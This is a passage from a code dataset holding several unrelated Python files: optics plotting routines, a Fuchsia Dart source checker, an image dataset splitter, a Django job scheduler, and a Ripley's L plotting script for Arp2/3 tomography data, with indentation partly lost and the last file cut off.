filename = "Air_to_Glass_R_T.txt"
#filename = "Glass_to_Air_R_T.txt"
if glob.glob(filename):
# import the dataset
data = np.loadtxt(filename, delimiter = ',', skiprows = 4, unpack = True)
hv_data = []; labels = []; marks = [];
hv_data.append([data[0], data[1]]); labels.append('$r_{TE}$'); marks.append(Plotting.labs_lins[0]);
hv_data.append([data[0], data[3]]); labels.append('$r_{TM}$'); marks.append(Plotting.labs_dashed[0]);
hv_data.append([data[0], data[2]]); labels.append('$t_{TE}$'); marks.append(Plotting.labs_lins[1]);
hv_data.append([data[0], data[4]]); labels.append('$t_{TM}$'); marks.append(Plotting.labs_dashed[1]);
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Input Angle (rad)'
args.y_label = 'Reflection / Transmission'
args.fig_name = filename.replace('.txt','')
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
else:
raise Exception
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_r_t():
# make a plot of the computed dielectric layer reflection / transmission curves
# <NAME> 17 - 6 - 2020
FUNC_NAME = ".layer_r_t()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
#filename = "Air_Silicon_Silica_R_T.txt"
#filename = "Air_Silicon_Silica_R_T_Alt.txt"
#filename = "Air_Silica_Silicon_R_T.txt"
filename = "Air_Silica_Silicon_R_T_Alt.txt"
if glob.glob(filename):
# import the dataset
data = np.loadtxt(filename, delimiter = ',', unpack = True)
lscale = (1.0/1550.0)
hv_data = []; labels = []; marks = [];
hv_data.append([data[0]*lscale, data[1]]); labels.append('$R_{TE}$'); marks.append(Plotting.labs_lins[0]);
hv_data.append([data[0]*lscale, data[3]]); labels.append('$R_{TM}$'); marks.append(Plotting.labs_dashed[0]);
hv_data.append([data[0]*lscale, data[2]]); labels.append('$T_{TE}$'); marks.append(Plotting.labs_lins[1]);
hv_data.append([data[0]*lscale, data[4]]); labels.append('$T_{TM}$'); marks.append(Plotting.labs_dashed[1]);
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Layer Thickness / Wavelength'
args.y_label = 'Reflectivity / Transmissivity'
args.plt_range = [data[0][0]*lscale, data[0][-1]*lscale, 0.0, 1.0]
args.fig_name = filename.replace('.txt','')
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
else:
raise Exception
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_r_t_alt_compare():
# make a plot of the computed dielectric layer reflection / transmission curves
# <NAME> 17 - 6 - 2020
FUNC_NAME = ".layer_r_t()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
#filename = "Air_Silicon_Silica_R_T.txt"
#filename = "Air_Silicon_Silica_R_T_Alt.txt"
filename1 = "Air_Silica_Silicon_R_T.txt"
filename2 = "Air_Silica_Silicon_R_T_Alt.txt"
if glob.glob(filename1) and glob.glob(filename2):
# import the dataset
data1 = np.loadtxt(filename1, delimiter = ',', unpack = True)
data2 = np.loadtxt(filename2, delimiter = ',', unpack = True)
lscale = (1.0/1550.0)
hv_data = []; labels = []; marks = [];
hv_data.append([data1[0]*lscale, data1[1]]); labels.append('$R_{TE}$'); marks.append(Plotting.labs_lins[0]);
hv_data.append([data1[0]*lscale, data1[2]]); labels.append('$T_{TE}$'); marks.append(Plotting.labs_lins[1]);
hv_data.append([data2[0]*lscale, data2[1]]); labels.append('$R_{TE}^{alt}$'); marks.append(Plotting.labs_dashed[0]);
hv_data.append([data2[0]*lscale, data2[2]]); labels.append('$T_{TE}^{alt}$'); marks.append(Plotting.labs_dashed[1]);
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Layer Thickness / Wavelength'
args.y_label = 'Reflectivity / Transmissivity'
args.plt_range = [data1[0][0]*lscale, data1[0][-1]*lscale, 0.0, 1.0]
args.fig_name = filename1.replace('.txt','') + '_Compar'
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
else:
raise Exception
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_AR():
# make a plot of the computed dielectric layer AR coating reflection curve
# <NAME> 17 - 6 - 2020
FUNC_NAME = ".layer_AR()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
filename = "Air_MgF2_Glass.txt"
#filename = "Air_SiO2_SiN.txt"
if glob.glob(filename):
# import the dataset
data = np.loadtxt(filename, delimiter = ',', unpack = True)
hv_data = []; labels = []; marks = [];
#hv_data.append([data[0], data[1]]); labels.append('T = 267.24 nm'); marks.append(Plotting.labs_lins[0]);
hv_data.append([data[0], data[1]]); labels.append('T = 101.86 nm'); marks.append(Plotting.labs_lins[0]);
hv_data.append([data[0], data[3]]); labels.append('2 T'); marks.append(Plotting.labs_lins[1]);
#hv_data.append([data[0], data[2]]); labels.append('3 T'); marks.append(Plotting.labs_lins[2]);
#hv_data.append([data[0], data[4]]); labels.append('4 T'); marks.append(Plotting.labs_lins[3]);
hv_data.append([data[0], data[5]]); labels.append('5 T'); marks.append(Plotting.labs_lins[4]);
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Wavelength nm'
args.y_label = 'Reflectivity'
args.plt_range = [data[0][0], data[0][-1], 0.0, 0.05]
args.fig_name = filename.replace('.txt','')
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
else:
raise Exception
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_HR():
# make a plot of the computed dielectric layer HR coating reflection curve
# <NAME> 17 - 6 - 2020
FUNC_NAME = ".layer_HR()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
filename = "HR_Coating_15.txt"
if glob.glob(filename):
# import the dataset
data = np.loadtxt(filename, delimiter = ',', unpack = True)
hv_data = []; labels = []; marks = [];
hv_data.append([data[0], data[1]]); labels.append('R'); marks.append(Plotting.labs_lins[0]);
hv_data.append([data[0], data[2]]); labels.append('T'); marks.append(Plotting.labs_lins[1]);
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Wavelength nm'
args.y_label = 'Reflectivity / Transmissivity'
args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
args.fig_name = filename.replace('.txt','')
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
else:
raise Exception
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_HR_2():
# make a plot of the computed dielectric layer HR reflection curves
# <NAME> 19 - 6 - 2020
FUNC_NAME = ".layer_HR_2()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
hv_data = []; labels = []; marks = [];
files = ["HR_Coating_7.txt","HR_Coating_11.txt","HR_Coating_15.txt"]
count = 7;
i=0
for f in files:
if glob.glob(f):
data = np.loadtxt(f, delimiter = ',', unpack = True)
hv_data.append([data[0], data[1]]); labels.append('Layers = %(v1)d'%{"v1":count}); marks.append(Plotting.labs_lins[i])
count = count + 4
i = i + 1
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Wavelength nm'
args.y_label = 'Reflectivity'
args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
args.fig_name = 'HR_Coating'
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_BP():
# make a plot of the computed dielectric BP filter transmission curve
# <NAME> 22 - 6 - 2020
FUNC_NAME = ".layer_BP()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
filename = "BP_Filter_3.txt"
if glob.glob(filename):
# import the dataset
data = np.loadtxt(filename, delimiter = ',', unpack = True)
hv_data = []; labels = []; marks = [];
hv_data.append([data[0], data[1]]); labels.append('R'); marks.append(Plotting.labs_lins[0]);
hv_data.append([data[0], data[2]]); labels.append('T'); marks.append(Plotting.labs_lins[1]);
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Wavelength nm'
args.y_label = 'Reflectivity / Transmissivity'
args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
args.fig_name = filename.replace('.txt','')
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
else:
raise Exception
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_BP_2():
# make a plot of the computed dielectric layer HR reflection curves
# <NAME> 19 - 6 - 2020
FUNC_NAME = ".layer_BP_2()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
hv_data = []; labels = []; marks = [];
files = ["BP_Filter_1.txt","BP_Filter_2.txt","BP_Filter_3.txt","BP_Filter_4.txt"]
count = 1;
i=0
for f in files:
if glob.glob(f):
data = np.loadtxt(f, delimiter = ',', unpack = True)
hv_data.append([data[0], data[2]]); labels.append('Layers = %(v1)d'%{"v1":count}); marks.append(Plotting.labs_lins[i])
count = count + 1
i = i + 1
# make the plot of the data set
args = Plotting.plot_arg_multiple()
args.loud = True
args.crv_lab_list = labels
args.mrk_list = marks
args.x_label = 'Wavelength nm'
args.y_label = 'Transmissivity'
args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
args.fig_name = 'BP_Filter'
Plotting.plot_multiple_curves(hv_data, args)
del hv_data; del labels; del marks;
except Exception as e:
print(ERR_STATEMENT)
print(e)
def layer_BP_BW():
# make a plot of the computed dielectric BP filter transmission curve bandwidth
# <NAME> 22 - 6 - 2020
FUNC_NAME = ".layer_BP_BW()" # use this in exception handling messages
ERR_STATEMENT = "Error: " + MOD_NAME_STR + FUNC_NAME
try:
# the data
x = [1, 2, 3, 4, 5]
y = [151.70, 22.48, 3.86, 0.67, 0.12]
# make the plot of the data set
args = Plotting.plot_arg_single()
args.loud = True
#args.curve_label = labels
args.marker = Plotting.labs_mrk_only[3]
args.x_label = 'No. Layer Pairs'
args.y_label = 'Transmission BW (nm)'
#args.plt_range = [data[0][0], data[0][-1], 0.0, 1.0]
args.fig_name = 'BP_Filter_BW'
Plotting.plot_single_curve(x, y, args)
except Exception as e:
print(ERR_STATEMENT)
print(e)
def main():
pass
if __name__ == '__main__':
main()
pwd = os.getcwd() # get current working directory
#print(pwd)
#iface_r_t()
#layer_r_t()
layer_r_t_alt_compare()
#layer_AR()
#layer_HR_2()
#layer_BP()
#layer_BP_2()
#layer_BP_BW()
| StarcoderdataPython |
3285575 | #!/usr/bin/env python3.8
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import os
import sys
import pathlib
def main():
parser = argparse.ArgumentParser(
"Verifies that all .dart files are included in sources, and sources don't include nonexsitent files"
)
parser.add_argument(
"--source_dir",
help="Path to the directory containing the package sources",
required=True)
parser.add_argument(
"--stamp",
help="File to touch when source checking succeeds",
required=True)
parser.add_argument(
"sources", help="source files", nargs=argparse.REMAINDER)
args = parser.parse_args()
actual_sources = set()
# Get all dart sources from source directory.
src_dir_path = pathlib.Path(args.source_dir)
for (dirpath, dirnames, filenames) in os.walk(src_dir_path, topdown=True):
relpath_to_src_root = pathlib.Path(dirpath).relative_to(src_dir_path)
actual_sources.update(
os.path.normpath(relpath_to_src_root.joinpath(filename))
for filename in filenames
if pathlib.Path(filename).suffix == ".dart")
expected_sources = set(args.sources)
# It is possible for sources to include dart files outside of source_dir.
actual_sources.update(
[
s for s in (expected_sources - actual_sources)
if src_dir_path.joinpath(s).resolve().exists()
],
)
if actual_sources == expected_sources:
with open(args.stamp, "w") as stamp:
stamp.write("Success!")
return 0
def sources_to_abs_path(sources):
return sorted(str(src_dir_path.joinpath(s)) for s in sources)
missing_sources = actual_sources - expected_sources
if missing_sources:
print(
'\nSource files found that were missing from the "sources" parameter:\n{}\n'
.format("\n".join(sources_to_abs_path(missing_sources))),
)
nonexistent_sources = expected_sources - actual_sources
if nonexistent_sources:
print(
'\nSource files listed in "sources" parameter but not found:\n{}\n'.
format("\n".join(sources_to_abs_path(nonexistent_sources))),
)
return 1
if __name__ == "__main__":
sys.exit(main())
| StarcoderdataPython |
3385413 | import os
import argparse
import random
import shutil
from shutil import copyfile
def printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
"""
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filledLength = int(length * iteration // total)
bar = fill * filledLength + '-' * (length - filledLength)
print('\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\r')
# Print New Line on Complete
if iteration == total:
print()
def rm_mkdir(dir_path):
if os.path.exists(dir_path):
shutil.rmtree(dir_path)
# print('Remove path - %s'%dir_path)
os.makedirs(dir_path)
# print('Create path - %s'%dir_path)
def main(config):
rm_mkdir(config.trainrgb)
rm_mkdir(config.trainannot)
rm_mkdir(config.validannot)
rm_mkdir(config.validrgb)
# rm_mkdir(config.test_path)
# rm_mkdir(config.test_GT_path)
filenames = os.listdir(config.origin_data_path)
data_list = []
GT_list = []
for filename in filenames:
ext = os.path.splitext(filename)[-1] # 提取文件名的后缀
if ext == '.png':
filename = filename.split('_')[-1][:-len('.png')]
data_list.append(filename + '.png')
GT_list.append(filename + '.png')
num_total = len(data_list)
num_train = int((config.train_ratio / (config.train_ratio + config.valid_ratio )) * num_total)
num_valid = int((config.valid_ratio / (config.train_ratio + config.valid_ratio )) * num_total)
# num_test = num_total - num_train - num_valid
print('\nNum of train set : ', num_train)
print('\nNum of valid set : ', num_valid)
# print('\nNum of test set : ', num_test)
Arange = list(range(num_total))
random.shuffle(Arange)
for i in range(num_train):
idx = Arange.pop()
# 将原始的所有数据选取和train相同的数据copy
src = os.path.join(config.origin_data_path, data_list[idx])
dst = os.path.join(config.trainrgb, data_list[idx])
copyfile(src, dst)
# 将原始的所有数据选取和train-GT相同的数据copy
src = os.path.join(config.origin_GT_path, GT_list[idx])
dst = os.path.join(config.trainannot, GT_list[idx])
copyfile(src, dst)
printProgressBar(i + 1, num_train, prefix='Producing train set:', suffix='Complete', length=50)
for i in range(num_valid):
idx = Arange.pop()
# 将原始的所有数据选取和valid相同的数据copy
src = os.path.join(config.origin_data_path, data_list[idx])
dst = os.path.join(config.validrgb, data_list[idx])
copyfile(src, dst)
# 将原始的所有数据选取和valid-GT相同的数据copy
src = os.path.join(config.origin_GT_path, GT_list[idx])
dst = os.path.join(config.validannot, GT_list[idx])
copyfile(src, dst)
printProgressBar(i + 1, num_valid, prefix='Producing valid set:', suffix='Complete', length=50)
# for i in range(num_test):
# idx = Arange.pop()
# # 将原始的所有数据选取和test相同的数据copy
# src = os.path.join(config.origin_data_path, data_list[idx])
# dst = os.path.join(config.test_path, data_list[idx])
# copyfile(src, dst)
# # 将原始的所有数据选取和test-GT相同的数据copy
# src = os.path.join(config.origin_GT_path, GT_list[idx])
# dst = os.path.join(config.test_GT_path, GT_list[idx])
# copyfile(src, dst)
#
# printProgressBar(i + 1, num_test, prefix='Producing test set:', suffix='Complete', length=50)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# model hyper-parameters
parser.add_argument('--train_ratio', type=float, default=0.9)
parser.add_argument('--valid_ratio', type=float, default=0.1)
# parser.add_argument('--test_ratio', type=float, default=0.05)
# data path
parser.add_argument('--origin_data_path', type=str,
default='/home/zhouyilong/dataset/2/img')
parser.add_argument('--origin_GT_path', type=str,
default='/home/zhouyilong/dataset/2/groundtruth')
parser.add_argument('--trainrgb', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/trainrgb')
parser.add_argument('--trainannot', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/trainannot')
parser.add_argument('--validrgb', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/valrgb')
parser.add_argument('--validannot', type=str, default='/home/zhouyilong/github/YNet-master/stage1/data/valannot')
# parser.add_argument('--test_path', type=str, default='/home/zhouyilong/github/R2AttU_Net/data/test/')
# parser.add_argument('--test_GT_path', type=str, default='/home/zhouyilong/github/R2AttU_Net/data/test_GT/')
config = parser.parse_args()
print(config)
main(config) | StarcoderdataPython |
15596 | <gh_stars>1-10
from ..models import Job
from engine.scripts.mirmachine_args import run_mirmachine
from .socket_helper import announce_status_change, announce_queue_position, announce_initiation, announce_completed
from .maintainer import clean_up_temporary_files
from django.utils import timezone
from MirMachineWebapp import user_config as config
def schedule_job(stop):
ongoing = Job.objects.filter(status='ongoing')
# check if already job running
if ongoing.exists():
return
queued = Job.objects.filter(status='queued').order_by('initiated')
# check if queue is empty
if not queued.exists():
if config.AUTO_CLEANUP_TEMP_FILES:
clean_up_temporary_files()
return
next_in_line = queued[0]
next_in_line.status = 'ongoing'
next_in_line.initiated = timezone.now()
next_in_line.save()
announce_status_change(next_in_line)
announce_initiation(next_in_line)
for i in range(len(queued)):
announce_queue_position(queued[i], i+1)
try:
process, job_object = run_mirmachine(next_in_line, stop)
handle_job_end(process, job_object)
except OSError:
next_in_line.status = 'halted'
next_in_line.save()
announce_status_change(next_in_line)
except RuntimeError:
print('Interrupted, exiting thread')
return
schedule_job(stop)
def handle_job_end(process, job_object):
if process.returncode != 0:
job_object.status = 'halted'
else:
job_object.status = 'completed'
job_object.completed = timezone.now()
job_object.save()
announce_completed(job_object)
announce_status_change(job_object)
| StarcoderdataPython |
11379460 | from .argmax import argmax
from .converter import convert_str_to_datetime, convert_datetime_to_str
from .cumsum import cumsum
from .fillna import fillna
from .math import multiply, divide, add, subtract
from .melt import melt
from .percentage import percentage
from .pivot import pivot, pivot_by_group
from .query_df import query, query_df
from .rank import rank
from .rename import rename
from .replace import replace
from .sort import sort_values
from .top import top
from .waterfall import waterfall
| StarcoderdataPython |
8055414 | """
Generate graphs with results for Arp2/3 project
Input: - 2nd order results for W and IT
- 1st order results for W and IT
Output: - Plots with the results
"""
################# Package import
import os
import pickle
import numpy as np
import scipy as sp
import sys
import time
from surf_dst import pexceptions, sub, disperse_io, surf
from surf_dst.globals import unpickle_obj, sort_dict
from surf_dst.surf.model import ModelCSRV
from surf_dst.surf.utils import list_tomoparticles_pvalues
from surf_dst.spatial.sparse import compute_hist
from matplotlib import pyplot as plt, rcParams
###### Global variables
__author__ = '<NAME>'
BAR_WIDTH = .35
rcParams['axes.labelsize'] = 20
rcParams['xtick.labelsize'] = 20
rcParams['ytick.labelsize'] = 20
########################################################################################
# PARAMETERS
########################################################################################
ROOT_PATH = '/fs/pool/pool-lucic2/antonio/tomograms/marion/Arp23complex'
# Input STAR files
in_star_w = ROOT_PATH + '/ltomos_all/W_all_mask/W_all_mask_ltomos.star'
in_star_it = ROOT_PATH + '/ltomos_all/IT_all_mask/IT_all_mask_ltomos.star'
# Input matrices (optional - organization analysis is skipped)
in_mats_w2nd = ROOT_PATH + '/uni_sph_all_W/W_all_sim200_org_lists.pkl'
in_mats_it2nd = ROOT_PATH + '/uni_sph_all_IT/IT_all_sim200_org_lists.pkl'
in_sims_w2nd = ROOT_PATH + '/uni_sph_all_W/W_all_sim200_org_sims.pkl'
in_sims_it2nd = ROOT_PATH + '/uni_sph_all_IT/IT_all_sim200_org_sims.pkl'
in_mats_w1st = ROOT_PATH + '/uni_sph_1st_all_W/W_all_sim20_wspace.pkl'
in_mats_it1st = ROOT_PATH + '/uni_sph_1st_all_IT/IT_all_sim20_wspace.pkl'
# Output directory
out_dir = ROOT_PATH + '/plots'
# Analysis variables
ana_res = 1.684 # nm/voxel
ana_rg = np.arange(5, 1100, 10) # np.arange(5, 800, 10) # np.arange(4, 100, 2) # in nm
# P-value computation settings
# Simulation model (currently only CSRV)
p_per = 1 # 5 # %
# Firts order analysis
ana_nbins = 20
ana_rmax = 200
# Figure saving options
fig_fmt = '.png' # if None they showed instead
# Plotting options
pt_xrange = [0, 1100] # [0, 800]
pt_dxrange = [0, 380]
pt_yrange = [-25, 25]
pt_cmap = plt.get_cmap('gist_rainbow')
###### Additional functionality
# Computes IC from a matrix of measurements (n_arrays, array_samples)
def compute_ic(per, sims):
if len(sims.shape) == 1:
return sims, sims, sims
ic_low = np.percentile(sims, per, axis=0, interpolation='linear')
ic_med = np.percentile(sims, 50, axis=0, interpolation='linear')
ic_high = np.percentile(sims, 100 - per, axis=0, interpolation='linear')
return ic_low, ic_med, ic_high
# Computes pvalue from a matrix of simulations (n_arrays, array_samples)
def compute_pvals(exp_med, sims):
n_sims = float(sims.shape[0])
p_vals_low, p_vals_high = np.zeros(shape=exp_med.shape, dtype=np.float32), \
np.zeros(shape=exp_med.shape, dtype=np.float32)
for i, exp in enumerate(exp_med):
sim_slice = sims[:, i]
p_vals_high[i] = float((exp > sim_slice).sum()) / n_sims
p_vals_low[i] = float((exp < sim_slice).sum()) / n_sims
return p_vals_low, p_vals_high
########################################################################################
# MAIN ROUTINE
########################################################################################
print '\tLoading input STAR file...'
star_w, star_it = sub.Star(), sub.Star()
try:
star_w.load(in_star_w)
star_it.load(in_star_it)
except pexceptions.PySegInputError as e:
print 'ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"'
print 'Terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
set_lists_w, set_lists_it = surf.SetListTomoParticles(), surf.SetListTomoParticles()
for row in range(star_w.get_nrows()):
ltomos_pkl = star_w.get_element('_psPickleFile', row)
ltomos = unpickle_obj(ltomos_pkl)
set_lists_w.add_list_tomos(ltomos, ltomos_pkl)
for row in range(star_it.get_nrows()):
ltomos_pkl = star_it.get_element('_psPickleFile', row)
ltomos = unpickle_obj(ltomos_pkl)
set_lists_it.add_list_tomos(ltomos, ltomos_pkl)
print '\tComputing densities...'
dens_w = np.asarray(set_lists_w.density_by_tomos(surface=False).values(), dtype=float)
dens_it = np.asarray(set_lists_it.density_by_tomos(surface=False).values(), dtype=float)
means = np.asarray((dens_w.mean(), dens_it.mean()))
stds = np.asarray((dens_w.std()/np.sqrt(float(dens_w.shape[0])), dens_it.std()/np.sqrt(float(dens_it.shape[0]))))
plt.figure()
plt.ylabel('Density [particles/nm$^3$]')
plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
plt.bar(0.25, means[0], 0.5, color='orange', yerr=stds[0], ecolor='k', linewidth=4, error_kw={'elinewidth':4, 'capthick':4})
plt.bar(1.25, means[1], 0.5, color='springgreen', yerr=stds[1], ecolor='k', linewidth=4, error_kw={'elinewidth':4, 'capthick':4})
plt.xticks((0.5, 1.5), ('W', 'IT'))
plt.xlim(0, 2)
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IT_density' + fig_fmt, dpi=600)
plt.close()
print '\tPickling input matrices...'
if in_mats_w2nd is not None:
with open(in_mats_w2nd, 'r') as pkl:
mats_w2nd = pickle.load(pkl)
if in_mats_it2nd is not None:
with open(in_mats_it2nd, 'r') as pkl:
mats_it2nd = pickle.load(pkl)
if in_sims_w2nd is not None:
with open(in_sims_w2nd, 'r') as pkl:
sims_w2nd = pickle.load(pkl)
if in_sims_it2nd is not None:
with open(in_sims_it2nd, 'r') as pkl:
sims_it2nd = pickle.load(pkl)
if mats_w2nd is not None:
plt.figure()
plt.ylabel('<NAME>')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='W-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IC-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, 10, y_max))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_RipleyL' + fig_fmt, dpi=600)
plt.close()
flt_ncoefs = 9
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
mat = sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='W-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
ic_low = sp.signal.savgol_filter(ic_low, flt_ncoefs, 2, mode='interp')
ic_med = sp.signal.savgol_filter(ic_med, flt_ncoefs, 2, mode='interp')
ic_high = sp.signal.savgol_filter(ic_high, flt_ncoefs, 2, mode='interp')
ic_low_5 = sp.signal.savgol_filter(ic_low_5, flt_ncoefs, 2, mode='interp')
ic_high_95 = sp.signal.savgol_filter(ic_high_95, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IC-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, 10, y_max))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_RipleyL_sgflt' + fig_fmt, dpi=600)
plt.close()
plt.figure()
plt.ylabel('Ripley\'s L\'')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
mat = np.gradient(sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp'), ana_rg[1]-ana_rg[0])
ana_rg_c = ana_rg[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
mat_c = mat[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
plt.plot(ana_rg_c, mat_c, linewidth=3, color='blue', label='W-experimental')
x_min, y_min = ana_rg_c[mat_c.argmin()], mat_c.min()
plt.plot((x_min, x_min), (-.1, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_min), (y_min, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, 100, x_min, 250))
plt.yticks((-.1, y_min, 0, .2, .4))
if pt_xrange is not None:
plt.xlim(pt_dxrange)
if pt_yrange is not None:
plt.ylim((-.1, .5))
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_RipleyL_sgdif' + fig_fmt, dpi=600)
plt.close()
else:
print 'ERROR: organization could not be computed'
print 'Unsuccessfully terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
if mats_it2nd is not None:
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='IT-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IT-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, y_max, 20))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
